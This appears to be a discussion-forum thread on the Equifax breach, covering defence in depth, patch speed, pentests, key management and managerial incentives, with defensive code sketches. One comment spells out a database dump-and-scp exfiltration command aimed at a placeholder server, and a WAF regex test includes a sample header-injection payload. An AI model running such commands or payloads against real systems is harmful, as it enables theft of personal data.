If a hacker can use just one CVE to break into your system and do a database dump (or equivalent), the system is architecturally misdesigned and protected by only a single layer of security. Which means anyone on the inside can access pretty much the same info as the hacker, which is horrible.
For example, are the items in DB encrypted? Are database backups encrypted? Are different items encrypted using different keys? I don't think EFX did it right.
> If a hacker can use just one CVE to break into your system and do a database dump (or equivalent), the system is architecturally misdesigned and protected by only a single layer of security. Which means anyone on the inside can access pretty much the same info as the hacker, which is horrible.
This is how it works at almost every company. Call it horrible if you want, but everyone stops short of describing in detail the exact architectural replacement. And when someone does, it inevitably has flaws that make it impossible to meet business goals.
It's too easy to handwave this away as "well, get a better architecture." Everyone knows that; the hard part is, what architecture? How does your architecture work in practice? Encrypting items won't help when the keys need to be stored in the same place to access the data. The attackers will just go after that box instead of the DB.
You can guard it more carefully, but the point is that some box somewhere needs access to a substantial amount of the data at any given time. It's the nature of a credit bureau.
In multiple threads now I've seen you express this sentiment. I just don't buy it. Vanguard hasn't had a leak like this. USAA hasn't had a leak like this. ETrade, Fidelity, etc, no leaks like this of which I'm aware (correct me if I'm wrong). These are big plodding institutions too. No leaks like this from Google nor Facebook nor Amazon. Maybe you're arguing it's just a matter of time, but I disagree.
Equifax had a trivially easy architecture to break.
Minimally, the data should be on a separate set of servers protected by an API with rate limiting, and that API should be implemented on top of a different framework than the front-end servers to minimize the chance that a single flaw would open up the entire set of data. This isn't rocket science. Equifax is a multi-billion dollar company. They could and should have done better.
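To make the rate-limiting part concrete, here's a minimal sketch in Python of a per-caller token bucket such an internal API could enforce. The caller IDs and thresholds are made up for illustration; this is not a claim about how Equifax's systems were or should exactly be built.

    import time
    from collections import defaultdict

    # Hypothetical per-caller token bucket: each front-end credential gets
    # `capacity` lookups, refilled at `refill_rate` per second. A compromised
    # front end can still query records, but not dump them in bulk.
    class TokenBucket:
        def __init__(self, capacity=100, refill_rate=1.0):
            self.capacity = capacity
            self.refill_rate = refill_rate
            self.tokens = defaultdict(lambda: capacity)
            self.last = defaultdict(time.monotonic)

        def allow(self, caller_id):
            now = time.monotonic()
            elapsed = now - self.last[caller_id]
            self.last[caller_id] = now
            self.tokens[caller_id] = min(
                self.capacity,
                self.tokens[caller_id] + elapsed * self.refill_rate,
            )
            if self.tokens[caller_id] >= 1:
                self.tokens[caller_id] -= 1
                return True
            return False  # reject (and ideally alert) once the budget is spent

    bucket = TokenBucket(capacity=100, refill_rate=1.0)
    if not bucket.allow("dispute-portal-frontend-01"):   # hypothetical caller ID
        raise PermissionError("rate limit exceeded; page the security team")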
Please stop defending them?
Disclosure: I've worked for Yahoo (er, Verizon) since late 2013. I don't know the details of Yahoo's data leaks, but it was not as trivial as getting RCE on Yahoo's public facing servers.
When two people are clearly intelligent but disagree, the reason is almost always a different set of experiences. My experience differs from yours; if I could Vulcan my brain to yours, you'd see why I feel this way. You might still disagree, but it would be far less clear cut.
Now, I've seen nearly a hundred codebases and they all looked pretty much like Equifax. I don't even need to see Equifax to know the kind of disaster their codebase facilitated.
Equifax's codebase is your code, and my code, and Bob's code. The only way to make this situation better is to talk openly about it. And the best way to do that is to actively defend the unpopular side in order to call attention to uncomfortable truths. It's a calculated strategy.
Just because you worked at a place with good security hygiene, it makes no difference to the world at large. Everybody else looks like Equifax. We need to (a) acknowledge that and (b) actively seek out solutions. That's what's happening here.
Ask yourself: "Why do I disagree when I've seen one or two enterprise codebases?" Those big, plodding institutions you mention are similarly vulnerable. Everyone is.
Why aren't data breaches happening almost daily? Because it's illegal. It's no coincidence that companies with public bug bounties are among the hardest targets to hit. When you make it not-illegal to attack you, surprise: you find the vulns.
A good question is, "is it illegal for a white hat to attack my business?" If the answer is yes, seek to change that. It's a low effort thing that will increase your security posture. But it's no substitute for $40k pentests.
I don't doubt that there are other Equifaxes out there, nor do I doubt that there will be more leaks. But this wasn't a simple matter of a horrible code base. Heck, the leak wasn't even due to Equifax code, it was due to third party code. Other companies of Equifax's size apparently do better. Equifax should have done better, and I'll bet if the penalties for losing this data were more severe, would have done better.
(replying to your "What if $40k for a pentest becomes a rubber stamp?" question, which was an important observation)
Mm, it can become that. It's important to get a pentest from a reputable firm. At the one I worked at, it was a point of pride to come up with clever attacks. We'd make a sport of it and try to one-up each other. But it's easy to imagine some other pentest firm just going through the motions, running Nessus and calling it a day.
Unfortunately, that's where money really does make a difference. $40k is at the low end of how absurdly expensive pentests are. Yet they make all the difference -- one app that I pentested was at a trading firm. I took that app from "typing ' leads to SQLi in their Node backend," and "there was SQLi in their Java backend if you were clever" to "you'd have to be more clever than me if you want to breach this app."
Most attacks come from unsophisticated adversaries. This implies that raising the bar higher than these guys gets you 80% of the way home. The other 20% is much harder, but it's doable if your company has a culture of caring about security.
> I think that more and more CISOs are becoming comfortable with the cloud and companies are insisting that CISOs become comfortable. So I always say that given enough time, we can secure anything and find a way to say yes to it and business-driven CISOs are of that mind.
> If a CISO can come up with a list of controls that he/she is comfortable with, then by and large the evidence proves that those controls are working effectively and are going to satisfy the elements of any framework that you use.
These are two soundbites from an interview with Susan Mauldin from over a year ago. Someone didn't want us to hear them, judging by the timeline[1]: the interviews were remembered and reported on September 9, taken down by September 10, and then, late last night, at least partially recovered again further down in this very HN thread!
They are not even especially damning soundbites if you take them out of context and evaluate them honestly in a vacuum, but they do add some context to "it was due to third party code," and in the context of this whole discussion, it is clear why someone did not want us to see this interview.
If the job of the CISO is to deliver the project under budget and on time, rather than to do the job correctly as you and I understand it, then we are certainly more likely to find ourselves in this position. So let's keep having these discussions and make it better! It is absolutely your codebase and my codebase, we are all in this kind of trouble (or, we could be... if we all similarly had 140 million involuntary "customers" entrusting us with their SSNs and credit histories.)
> If the job of the CISO is to deliver the project under budget and on time, rather than to do the job correctly as you and I understand it, then we are certainly more likely to find ourselves in this position
The same fault is responsible for the Space Shuttle Columbia crash. It's called "leadership without vision." If you put a manager in place and give them tight constraints on how they deliver the product, they will almost universally deliver a critically flawed product ... albeit, on time and under budget.
You can bet all you want. Your head will roll next, after Equifax and everyone else you decide to demonize. Once the avalanche starts, it won't stop.
Know what happens when you demonize something? People stop reporting it.
Look at the actual damage to actual people. You are arguing for prison time for the execs, if I remember correctly. Yet it's unclear whether a single person has been materially damaged by these leaks so far. If you want to suck away N years of someone's life, you have a higher bar to clear.
(Meta: I think we edited our replies past each other.)
I haven't commented on the Equifax incident, so you're confusing me for someone else. I don't have an opinion one way or the other on criminal negligence.
How do we incentivize (or regulate?) companies to do a better job handling confidential data?
Ah, gotcha. Isn't it a bit scary seeing people argue for prison time for this? It's pretty easy to imagine webdevs becoming the actual targets / scapegoats rather than the execs.
A note of "Well, let's not be too hasty" would seem to be in order.
Part of the problem is that security breaches matter, but they don't matter. It's like the negative externality of factory pollution. One day perhaps the effects will become visible, but this disaster is about as bad as you can get and it's still not obvious that a lot of people are going to lose anything significant from the breach. If someone wanted to impersonate you, they can usually find a way already.
Of course, if the 140M SSNs become public, that will change the situation completely. Possibly even for the better: then we'd finally stop relying on them to be secret when they were never designed to be.
Believe it or not, the situation now is drastically better than it was a decade ago. People care about getting pentests now. You can grudgingly force a company to fork over the money.
One of the best ways to get companies to become more secure is to force them. Most of the companies who were being pentested didn't want to be; they were forced to, because some other business refused to do business with them until they produced a document stating they were reasonably secure. This special document is only obtainable from a security firm; hence, pentests happen, and the world is marginally more secure.
From what I've seen people want jail time because of the insider stock trading, not because of the security problem itself. So a webdev wouldn't be responsible unless they also engaged in insider trading.
Why would all of the various criminal organizations across the world be deterred by something being illegal?
The logic you have laid out makes it sound like only white hats would ever try to attack a credit agency.
I'm pretty sure that, by the definition of black hat and criminal organization, if these companies have something the criminals want, and the criminals have a technical means to get it, the fact that it's illegal is not a deterrent; it's actually their business model.
The vast majority of adversaries are incompetent or unmotivated. It's why breaches don't happen daily.
Look at it this way: If you get a pentest, you will immediately discover there were glaring security flaws that an attacker could have used to get into your network. This isn't true in every case, but for example I can count on one hand the number of companies I didn't get at least an XSS against.
I had no magic. I'm just a guy using Burp suite, working together with someone else using Burp suite. When two talented people work together to break your stuff, they pull out rabbits that nobody knew existed. Especially when they've been doing it full time every day for a year.
I'm sure black hats have talented people at their disposal. But they are selective. Launching a real operation against a US target is risky unless you live in Russia or work in China's army. And while it's valuable for Russian black hats to swipe Equifax's PII, other data troves typically aren't valuable enough to target.
To put it another way, if Russians got into Facebook, so what? They'd get everyone's sultry private messages. Yet Facebook cares more about security than almost anyone else. That's why it's almost impossible to swipe their data.
The vast majority of companies are in the "If Russians got in, it doesn't really matter; also we don't care" category. These are the mom and pop shops that use duct tape and glue for their payment processing. Above this are our companies: If Russians got in, it would be a minor disaster, but we care about preventing it. Except usually we don't care enough to put down $40k.
Then you have companies like Equifax. The worst of both worlds: They weren't careful enough with their security, and it was an unprecedented disaster when someone got in.
Yet even here, it's unclear how much this unprecedented disaster is going to materially harm people. Will those 140M SSNs show up on the black market for sale? Who will pay for them, and how much? (Hopefully it will be posted in full, in clear text, so we can all switch away from the stupid SSN system we've been relying on.)
So when it's a combination of not too valuable to attack you, very costly to improve your defenses, and not too harmful if you screw up, you get the present world: ~everybody is vulnerable, but few companies care enough to pay more than lip service. Why would they? Even if they lost everyone's data tomorrow, it would be little more than egg on their face.
This situation is changing, slowly. If the diff between 2008 and 2018 is like 2018 to 2028, we will be in excellent shape. But we have to avoid falling into traps like mandating regulation at every company, or sending people to prison. Those are tempting but misguided efforts: regulation would reduce the effectiveness of pentests, and sending people to prison will cause security breaches never to be reported.
It will be hard, particularly when the world reacts like this: https://i.imgur.com/g01f9vV.png But companies like Apple are paving the way forward. Even if they help no other companies, they are proof that security really can work at scale. The trick is to make it not cost Apple's resources to get remotely close to their security posture.
(I hate to pick on Russians specifically, but they have no extradition treaty with the US. It's uncontroversial to point out that many black hat attempts originate from there.)
Facebook cares about security because there is something else at stake: their trade secrets, to start with, and avoiding being front-run. But people would still care if they believed Facebook wasn't safe, even if only superficial things were at stake.
> Just because you worked at a place with good security hygiene, it makes no difference to the world at large. Everybody else looks like Equifax.
Equifax did have good security hygiene. But they didn't have perfect security hygiene, and this particular gap cost them big time.
Most security incidents are like terror attacks that are averted. You read that authorities in Spain stopped an attack, and it means the system is working and people are safe. Then something explodes in London, and people are hurt, and you realize that there's no such thing as complete security.
It remains to be seen how much this will cost Equifax, IMHO. Public opinion aside, it may not come to much in terms of dollars, and it's dollars that drive behavioral changes.
I don't believe those systems are necessarily any more secure than Equifax's. It may be that Equifax got breached first. But it's also partially because it's actually incredibly difficult to steal funds from traditional financial institutions. Not because of technical security measures. But because of procedure and regulations.
As an example, money illegitimately moved from bank A to bank B can (and in most cases must) be reversed. Even if done digitally.
I don't see sillysaurus3 defending Equifax. I see him talking about the elephant in the living room. No system is invulnerable, yet the fortune and well being of half (or more) of the population of our planet depends on those systems being safe. We need a new paradigm. The basic principles of security, no matter how skillfully and deeply applied, are inadequate to defend against a determined attacker. We need a new paradigm. I'm not sure what that is, and as a long-time Microsoft detractor, I'm loath to say that Azure's just-announced secure enclave architecture just might be that new paradigm. Of course, I'm sure they'll fuck it up some way or another.
You're right. I mischaracterized sillysaurus3's position. I would only argue that there are different levels of competence in protecting data and some company has to be the worst. So far, Equifax seems to be that company. Right now, they are deserving of scorn. At the same time, sure, it's good to recognize that we're failing at security as an industry.
I agree with you 100%. I prefer to characterize our current security landscape as the "Bear Attack" model. If you run slow the bear will eat you first. But even if you run faster than anyone else the bear will still eat you when she catches you.
Like much of the infrastructure in the real world, the sad fact of cybersecurity is that in many cases systems remain unbreached merely because no semi-informed attacker has committed much effort to getting in, or, more likely, an intruder has not yet triggered an event that would publicize their intrusion.
sillysaurus may be overgeneralizing a bit but he is correct about the vast majority of companies. To me, the key differentiator between companies with serious security projects v. companies with me-too, mantelpiece-style security projects is active, engaged technical leadership at the very top.
This is not to defend Equifax as much as it's to desecrate the widespread dogma of the managerial class that an MBA qualifies a person to lead any project. Time after time after time, most of us who've worked in corporate America have seen security pushed to the bottom of the stack, only becoming a consideration for about 18 months after the last close call or underpublicized breach. There is virtually no appreciation for the problem itself at high levels, or the complexity involved in reasonably subjugating it.
CISO is something of a nightmare job because you're essentially the company's designated patsy/lightning rod. Most of the time, CISOs and those in analogous roles get stuck with the blame for the company's security without ever really being given the authority to do anything about it.
I knew a CISO who set up camp, including a prop tent, outside the CIO's office until the CIO finally agreed to get his guys to patch a server. The CISO took a picture of himself doing so, because he knew the game: if an intrusion occurred, he would have visual proof that would let him deflect blame onto the CIO.
Reckless disregard like this is absolutely common and routine, and if you have any doubt about that, a cursory inspection of the sites of companies that are not tech pioneers will easily disabuse you of any contrary notion. Equifax is not alone here, not by a long shot. Not even among large companies dealing with sensitive financial data (don't ask how I know).
The only reason we haven't seen (or, more likely, haven't learned about) widespread cyber-intrusion-apocalypse is because semi-competent people just have other things to do, and there is substantial legal risk if caught. I fully believe that 95% of America's biggest companies have systems that are easily penetrable.
Again, let me reiterate that this is not making an excuse for Equifax. It's just acknowledging that the problem goes well beyond this single instance. We need a revolution in system admin and application security before we'll solve these issues, because the plain fact is that companies simply can't be trusted to do it under the current conditions.
Things one could do that would increase security without hindering business goals:
- PATCHING OF KNOWN CRITICAL SECURITY VULNERABILITIES IMMEDIATELY. This is an architectural decision! If you cannot put out a hotfix within months of a vulnerability being made public, YOUR APPLICATION & DEPLOYMENT DESIGNS ARE BROKEN.
- WAF rules for common attacks and known CVEs
- Least privilege enforced architecturally via stored procedures or microservices or something else so that a vulnerability in one application (the online dispute portal in this case) can't lead to a dump of everyone's PII.
- Data should be encrypted and encryption keys should be stored apart from both the application and the data. Upon startup, the application should make an authenticated request to read the encryption keys into memory (a rough sketch follows this list). This significantly raises the bar to dumping sensitive data.
- Monitoring for connections transferring anomalous amounts of data
That's just off the top of my head. All of these can be designed into a system and still maintain 100% uptime.
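As a rough illustration of the key-separation bullet above (a sketch, not a prescription): the application fetches its data key from a separate, authenticated key service at startup and holds it only in memory. The service URL, the identity token, and the use of Fernet are assumptions for the example.

    import os
    import requests                      # assumes the requests library is available
    from cryptography.fernet import Fernet

    # The data-encryption key never lives on disk next to the application or the
    # database. At startup the app authenticates to a separate key service
    # (URL and token here are hypothetical) and keeps the key in memory only.
    KEY_SERVICE_URL = "https://keys.internal.example/v1/data-key"   # hypothetical
    resp = requests.get(
        KEY_SERVICE_URL,
        headers={"Authorization": "Bearer " + os.environ["APP_IDENTITY_TOKEN"]},
        timeout=5,
    )
    resp.raise_for_status()
    fernet = Fernet(resp.content)        # key held in process memory only

    def decrypt_field(ciphertext: bytes) -> bytes:
        # An attacker who dumps the database gets ciphertext; they also need to
        # compromise this process (or the key service) to read it.
        return fernet.decrypt(ciphertext)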
It's also a business decision. You need to invest staff time in testing and automating said updates, and doing so will inevitably lead to more outages. Thus less profit, directly contrary to your assertion. Managers face a trade-off between a small but relatively predictable cost and a large but presumably highly improbable cost. This is something that neither data nor human intuition is particularly good with.
In the best-case scenario, insurance lets you convert your large risk into a small predictable cost, and the premium difference decides whether you stay on the CVE treadmill or not. But it's not like actuaries have a lot of data to model to the point of accurately imposing a cost per day of unpatched CVE.
Worse, many places have competitors, and if they're choosing to take on risks in the name of lower prices and higher market share, the customers of your secured app walk out the door. Not only do you need to invest in security, you need the competition to as well. I have a few ideas on how to achieve this, but they're not historically palatable to the HN crowd.
> You need to invest staff time in testing and automating said updates, and doing so will inevitably lead to more outages.
It should follow the same processes as any other application update. Are you suggesting it's impossible to push updates to software without incurring outages?
Judging by the number of banking and government institutions that have weekly or nightly planned outages, there appears to be a number of legacy systems where companies certainly think upgrades mandate outages. Even a non-zero probability of an outage is a cost.
Obviously this is fixable, but it's no free lunch.
The problem is that a lot of these systems aren't legacy. They've been built within the past 5 years, but the customers would almost rather continue on with their weekly outages than apply basic modern architectural designs that allow for functionality like round-robining updates behind a LB.
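For concreteness, here's a hedged sketch of what "round-robining updates behind a LB" can look like. The lb-ctl commands and the health-check endpoint are hypothetical stand-ins for whatever your load balancer and hosts actually expose.

    import subprocess
    import time

    # Patch one node at a time so the service as a whole never goes down.
    NODES = ["app-01", "app-02", "app-03"]

    def lb_drain(node):    subprocess.run(["lb-ctl", "drain", node], check=True)    # hypothetical CLI
    def lb_enable(node):   subprocess.run(["lb-ctl", "enable", node], check=True)   # hypothetical CLI
    def apply_patch(node): subprocess.run(["ssh", node, "sudo apply-security-patch"], check=True)
    def healthy(node):     return subprocess.run(["ssh", node, "curl -fsS localhost:8080/health"]).returncode == 0

    for node in NODES:
        lb_drain(node)                 # stop sending new traffic to this node
        time.sleep(30)                 # let in-flight requests finish
        apply_patch(node)              # patch/upgrade just this node
        if not healthy(node):          # continue only if the node comes back
            raise RuntimeError(f"{node} failed health check; halting the rollout")
        lb_enable(node)                # re-add it before touching the next node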
> It's also a business decision. You need to invest staff time in testing and automating said updates, and doing so will inevitably lead to more outages.
There are many vendors attacking this exact problem from many directions, including my employers[0], but pretty much every platform vendor has something here.
I do agree that automation and risk are at the root of the tension between security and stability. It's a feedback loop that can run in two directions. If you embrace stability, the loop becomes "no changes ever" and security becomes much more difficult to achieve in practice. If you embrace security, then at first you face instability -- but embracing rapidity and building out tooling for it makes you both more secure and more stable in the long run.
> But it's not like actuaries have a lot of data to model to the point of accurately imposing a cost per day of unpatched CVE.
I'd be interested to know if this is actually true.
I recently got interested in the FAIR risk modelling approach. It requires a bunch of legwork, so in practice it won't catch on without determination to use it or something like it.
Usefully it breaks risk down into more easily-estimated, easily-tracked subcomponents[1]. "Probability" becomes "Loss Event Frequency", which further breaks down into Threat Event Frequency and Vulnerability, these break down further in turn. Similarly, the usually-vague "Impact" becomes Primary Loss and Secondary Loss, each of which has 6 specific types that can be estimated. Those estimates can be based on available data, whether your own or industry statistics.
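A toy example of how those FAIR subcomponents roll up into a single number. The figures are invented purely for illustration.

    # Risk as Loss Event Frequency times Loss Magnitude, with LEF further
    # decomposed into Threat Event Frequency and Vulnerability.
    threat_event_frequency = 12      # attempted attacks per year (made up)
    vulnerability = 0.05             # probability an attempt becomes a loss event
    loss_event_frequency = threat_event_frequency * vulnerability

    primary_loss = 500_000           # response, replacement, lost productivity ($)
    secondary_loss = 2_000_000       # fines, reputation, legal ($)
    loss_magnitude = primary_loss + secondary_loss

    annualized_risk = loss_event_frequency * loss_magnitude
    print(f"Annualized loss exposure: ${annualized_risk:,.0f}")   # $1,500,000/yr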
> Worse, many places have competitors, and if they're choosing to take on risks in the name of lower prices and higher market share, the customers of your secured app walk out the door.
Interesting points, but you seem to have missed responding to your last > quote. The "> Worse, many...". I'd be interested to see what your remarks are there.
Ah, good catch, and this is why I should wait for caffeine levels to peak before screeding.
At work we have a lot of customers now, many of them with large security orgs. Their approaches vary a lot, presumably because of their experiences and security maturity.
Beyond a certain level, there is always a security org and quite typically it has veto powers that override any local manager's budgetary concerns. Whether that veto is applied well is quite distinct from the way it creates a ceiling over potential spending on features.
That all said, I agree that there are fundamental properties of security that will cause it to be consistently under-attended relative to what a more actuarial or financial model would suggest is rational. It is only observable in its absence, but most feedback systems -- formal or informal -- rely on observable signals. Market releases may lead to a juicy bonus at many companies. Invisible improvements won't.
I've thought about this a lot in the past few months and published a bunch about it internally at Pivotal. I'm not alone, of course. We're streets ahead of many vendors, but I also feel we're only getting started on the deeper and more difficult process of blending it deeply into our cultural DNA. It's a culture which believes in doing the right thing, but also a culture which detects vetoes as faults and routes around them.
> PATCHING OF KNOWN CRITICAL SECURITY VULNERABILITIES IMMEDIATELY.
I worked in system admin for many years. If anyone was actually foolish enough to do this, they would be dealing with multiple major outages every year.
> for every complex problem there is a solution that is simple, obvious, and wrong.
"There might be an outage" is the stupidest reason I have ever heard to advocate not applying security patches.
There are plenty of companies that are able to regularly patch and upgrade software, incident free. If your team isn't able to do this, they need to fix their process instead of putting their heads in the sand.
I am not defending the totality of EFX's process by any means. I am just pointing out that "install every high severity patch right away" is not as easy as it looks.
Others have pointed out this patch was not available for all current versions, for example. So, to install the patch you need to upgrade. Oh, that breaks <dependency>. So we need to upgrade <other thing>. But that regresses a feature we use ....
The major issue with EFX was the fragility of their overall architecture. A single weakness should not be enough to lay the whole DBMS open.
The tech industry has to move more towards declarative systems, rather than procedural ones. Docker, Kubernetes and similar tech can auto-update in the background without any downtime. It's impossible to maintain thousands of VMs without some sort of declarative system.
It actually decreases complexity. Updating 1000 VM servers using these technologies can be made automatic. True, it provides an additional attack surface, but the gains of having everything always patched are well worth it.
> Alternatively, there are sometimes political reasons. A director may not want to risk an outage for fear of being dressed down by their VP.
This is such a weird thing to me. I've never worked anywhere like this and so I have a hard time imagining it really. Wouldn't that same director get more than dressed down by the VP if on their watch a _known security vulnerability_ was ignored and the system was breached? I just can't understand this way of thinking.
It's easy to understand once you get just how simplistic it is. The VP will deliver a dressing down if the company loses money and the blame can be placed on the director.
The cost of an outage is very easy to quantify (revenue per minute the system is down), and the probability that something will go wrong while applying the patch is also somewhat easy to predict, and usually greater than zero. The director will be blamed with certainty for the outage, since he approved it.
The cost of a security breach is difficult to quantify; it depends on what gets breached and how badly. Note that I say breach, not vulnerability. Even with a known security vulnerability, it's not immediately obvious in all systems what the consequence will be; there may be other mitigations in place outside of software that reduce the potential damage, or there may be unknown vulnerabilities, exploitable via the known one, that would make a breach worse. The lack of certainty about the consequences also means the director can avoid blame if the breach is minor ("how was I supposed to know that other team is still using MD5?"). And if there is no breach, there is nothing for the director to be blamed for.
Given that the director would like to avoid being dressed down, he will be more inclined to delay patching than to risk causing an outage, because the costs of an outage are easy to predict and he will take all the blame for them. The breach may never happen, and even if it does, it may cost him personally less than the outage would.
If this still seems weird, it might be because you are someone who views patching as an easy thing to do, because you probably work for a software company. Software companies are used to managing changing software, and have all kinds of practices around minimizing the risks of doing so. Non-software companies typically find patching to be hard and costly because their core business is something else; changes can disturb the "something else."
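To make the incentive math concrete, here are some made-up numbers. The point isn't the specific figures, only that the director's personally-weighted calculation can favor delay even when patching is clearly the right call for the company.

    # For the company, patching is clearly worth it; from the director's seat,
    # the certain, attributable outage risk looms larger than the diffuse breach risk.
    revenue_per_minute = 2_000
    expected_outage_minutes = 30
    prob_patch_causes_outage = 0.10
    cost_of_patching_to_director = prob_patch_causes_outage * expected_outage_minutes * revenue_per_minute
    # = $6,000 in expectation, and the director is blamed for all of it

    prob_breach_while_unpatched = 0.01
    cost_of_breach = 5_000_000
    expected_cost_to_company = prob_breach_while_unpatched * cost_of_breach   # = $50,000
    prob_blame_lands_on_director = 0.10
    cost_of_not_patching_to_director = expected_cost_to_company * prob_blame_lands_on_director
    # = $5,000: less than $6,000, so "wait for the next maintenance window" wins

    print(cost_of_patching_to_director, cost_of_not_patching_to_director)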
While you may sort of have a point for low-severity issues (if you patch every one ASAP, you are constantly restarting; they should be tested as a group in staging and released to prod on a regular timeline), this was a 10.0 severity CVE, and it is _definitely_ the kind of issue that you tolerate some downtime for. Check out the CVE: this could be exploited by anyone with a basic knowledge of cURL in 60 seconds or less. The vulnerability was just a matter of sending an arbitrary command in an HTTP header.
You need to do some testing of course. "IMMEDIATELY" doesn't mean within 5 seconds. If you can't properly apply security updates in a reasonable time frame without it leading to major outages, something is extremely wrong with either the architecture, the chosen software or the QA and deployment strategy.
> without it leading to major outages
I think I would have preferred an outage over leaking millions of Americans' private information.
It's not the first time this has happened to a company, and it surely won't be the last. We've already had full 100% hindsight vision a dozen times over, and plenty of companies have chosen to ignore it.
- PATCHING OF KNOWN CRITICAL SECURITY VULNERABILITIES IMMEDIATELY.
Immediately? No real company can do this. 1-2 weeks after the announcement is the best you'll see, even with something of the magnitude and publicity of Heartbleed. I'm not saying that's how it should be, but that's how it is. For most organisations it's quarterly!
> All of these can be designed into a system and still maintain 100% uptime
Sure. If you were designing from a clean slate right now. The vast majority of organisations in the world aren't.
And believe me: in 10 or 20 years your new design would have revealed flaws too, and look laughably primitive to the practitioners of the day.
What's the solution then? An architecture in which no single compromise can compromise the entire system. That's getting harder and harder to do as the landscape homogenises around Lintel.
Impressive. Let me amend my original statement from "no" to "a tiny minority" then but I believe my point stands - frantic patching to keep up is no substitute for an architecture with no single point of vulnerability.
If you're on a computer there is always going to be a single point of failure with a window of vulnerability. Any piece of software, or combination thereof, can leave an RCE vulnerability, which means you always have a single point of vulnerability. I think what you mean is: is the unauthorized access isolated enough that, by the time an attacker finds the next thing to attack, you've noticed the odd network behavior, i.e. defense in depth? If so, yes. But there's a difference between frantic patches and a well controlled, tested, and easy to deploy set of software, which makes pushing updates much less "frantic" and much more controlled. No matter what your defense in depth is, you're always going to get an "oh fuck, we are totally uncovered" moment; this is where the agility helps out. Your other option in that case is "the emergency shut-down for the oasis", or the Equifax option of sticking your head in the sand and running the servers open for months. I assume we're all responsible adults here though, so that last one is off the table; it all comes down to risk assessment. EFX seems to have miscalculated on that one.
We need to differentiate then between "patch for this one specific thing" and "upgrade to the next version" which are often conflated. The former could literally be a one-line change to correct an off-by-one error say. The latter will have to go through the full regression and release process. Often it's a grey area.
Companies like Red Hat, Suse and Ubuntu provide security backporting for exactly this reason. It's one of the major reasons that folk subscribe to them.
Unless you are part of that "tiny minority", you have no business handling information that can substantially negatively impact people's lives.
Isn't it interesting that one needs a license to drive an automobile and yet companies that handle this type of information get to do so without demonstrating the required level of competence.
> Isn't it interesting that one needs a license to drive an automobile and yet companies that handle this type of information get to do so without demonstrating the required level of competence
Oh, it's the whole industry tho'. VMS running on DEC hardware was at a level of security and reliability that we can only dream of today, but it was abandoned on the scrapheap and replaced by glorified PCs running a hobbyist OS. If you wanted to build an infrastructure on old-skool principles now you couldn't, you can't get the components anymore. The truth is we're fighting a losing battle and the real enemy is ourselves.
They can, but it requires automation. I've worked on and used tooling for just such things. We can see an upstream CVE and have it patched in production inside 48hrs. Usually the same day.
Disclosure: I work for Pivotal. All this stuff (Cloud Foundry, BOSH etc) is opensource, but we sell commercial versions too.
> No real company can do this. 1-2 weeks after the announcement is the best you'll see
You don't need to patch your software right away, but you should have other strategies for mitigation, such as a WAF in front of your services that you can configure to block malicious traffic when you identify a remote code execution vulnerability.
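For example, the Struts flaw in question was exploited by smuggling expressions into the Content-* headers, so even a crude filter buys time while the real patch is tested. A sketch (illustrative patterns only, not a production WAF rule):

    import re

    # Reject requests whose Content-Type header contains expression-injection
    # markers. Patterns are illustrative, not an exhaustive or official rule set.
    SUSPICIOUS_CONTENT_TYPE = re.compile(r"%\{|\$\{|ognl|java\.lang\.Runtime", re.IGNORECASE)

    def is_suspicious(headers: dict) -> bool:
        value = headers.get("Content-Type", "")
        return bool(SUSPICIOUS_CONTENT_TYPE.search(value))

    # A legitimate upload passes; an injection attempt is flagged.
    assert not is_suspicious({"Content-Type": "multipart/form-data; boundary=xyz"})
    assert is_suspicious({"Content-Type": "%{(#cmd='whoami')}"})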
Seriously, FFS, these are guidelines that we use for not-remotely-that-sensitive data, and Equifax, that literally...
"You had one job to do, protect our data"
Can't follow?
This is just business being
a) ignorant
b) incompetent
c) careless
One or more of the above must have applied for a hack like this to happen.
It's really sad that even the ycombinator crowd doesn't get it, given that the crowd here is significantly more technical and sensitive to these issues than the average Equifax Joe.
No, we get cases A, B, and C, because those cases are really easy for anyone to understand. What you're missing is that some of the "ycombinator crowd" have worked with enough "average Equifax Joes" to know that the problems faced by "Equifax Joe" are not always solvable by merely being knowledgeable, competent, and careful.
> This is how it works at almost every company. Call it horrible if you want, but everyone stops short of describing in detail the exact architectural replacement. And when someone does, it inevitably has flaws that make it impossible to meet business goals.
No, it's not how almost every company works, and yes it IS horrible. Do you know why people stop short of giving details of what should have been done? Because that is a full time job for an entire team of people in any place that needs real security, and part of that job is to be constantly rooting out flaws in both design and implementation and fixing them. And guess what, if your business involves storing and retrieving sensitive personal information on millions of people, then security needs to be one of your business goals. If it is not, then that is negligent.
> It's too easy to handwave this away as "well, get a better architecture." Everyone knows that; the hard part is, what architecture? How does your architecture work in practice?
It is also easy to handwave away the real work that real security professionals do. Security is not just some module you can strap onto your systems; it is an ongoing process that requires vigilance and competence. Yes, it is hard, but being hard is not an excuse.
> Encrypting items won't help when the keys need to be stored in the same place to access the data. The attackers will just go after that box instead of the DB. You can guard it more carefully, but the point is that some box somewhere needs access to a substantial amount of the data at any given time. It's the nature of a credit bureau.
So you are implying that data encryption is not useful for protecting sensitive data because you have to store the keys somewhere. If that were the case then data encryption in general would be useless, we know that is not the case. This is a design or implementation problem, not an encryption problem.
It's frustrating how people seem not to think it's wildly, ludicrously incompetent that nothing in your architecture complains about your front end servers querying 140M records. The fact that they don't have even the most basic data access controls in place makes me assume they're still fully owned.
You're playing IT if you can't deploy a CVE fix in 60 days.
Finally, they only did this because of greed. They encourage online disputes because it saves them money and gives them greater rights vis-a-vis paper disputes delivered via snail mail. They could simply have taken the service down if they couldn't deploy a security patch in two months.
Amateur hour everywhere.
ps -- the data controls I mentioned above were implemented at a company of ~15 eng dealing with similar PII. If you owned the front end servers you could query individual records, but you would have to own more services to be able to "\copy (select * from data) to /legit.file; gzip /legit.file; scp /legit.file.gz $MY_SERVER". And if you tried, pagers would have gone off all over the company.
"How does your architecture work in practice? Encrypting items won't help when the keys need to be stored in the same place to access the data. The attackers will just go after that box instead of the DB."
Simple. Don't store a key with the data. A credit bureau only incurs liability by knowing the PII for hundreds of millions of people readable from one location - that they provide to everyone who asks!
How does a company create a better architecture? Separation of duties and responsibilities, defense in depth, authentication and authorization, cryptography, updating software, etc. Hire a security team to help with vulnerability analysis, design reviews, due diligence, and threat modeling.
This gets solved every day at many companies.
"You can guard it more carefully, but the point is that some box somewhere needs access to a substantial amount of the data at any given time. It's the nature of a credit bureau."
Yes, but the elephant in the room is that a credit bureau possesses that information in usable form. This can be taken care of by key management, where the individual owns the key and only one key is able to exist per individual at a time. Then, only those credit grantors who have been authorized by the individual are able to update or view the data.
